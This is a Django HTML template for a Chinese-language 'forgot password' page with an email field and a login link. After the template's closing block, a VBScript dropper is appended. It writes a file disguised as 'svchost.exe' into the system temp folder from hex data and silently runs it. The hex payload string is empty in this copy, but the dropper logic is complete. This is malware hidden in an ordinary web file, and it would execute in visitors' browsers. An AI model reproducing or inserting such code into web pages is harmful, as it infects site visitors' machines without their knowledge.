{% extends 'base.html' %}

{% block title %}忘记密码{% endblock title %}
{% block header %}

{% endblock header%}
{% block content %}
    <div class="login_top clearfix">
        <a href="index.html" class="login_logo"><img src=""></a>
    </div>

    <div class="login_form_bg">
        <div class="login_form_wrap clearfix">
            <div class="login_banner fl"></div>
            <div class="slogan fl">日夜兼程 · 急速送达</div>
            <div class="login_form fr">
                <div class="login_title clearfix">
                    <h1>忘记密码</h1>
                    <a href="{% url 'user:login' %}">登陆</a>
                </div>
                <div class="form_input">
                    <form action="{% url 'user:forget_password' %}" method="post">
                        {% csrf_token %}
                        <input type="email" name="email" class="name_input" placeholder="请输入注册邮箱"
                               value="{{ login_form.email.value }}">
                        <div class="errs">{{ message }}</div>
                        <input type="submit" name="" value="提交申请" class="input_submit">
                    </form>
                </div>
            </div>
        </div>
    </div>
{% endblock content %}
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = ""
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>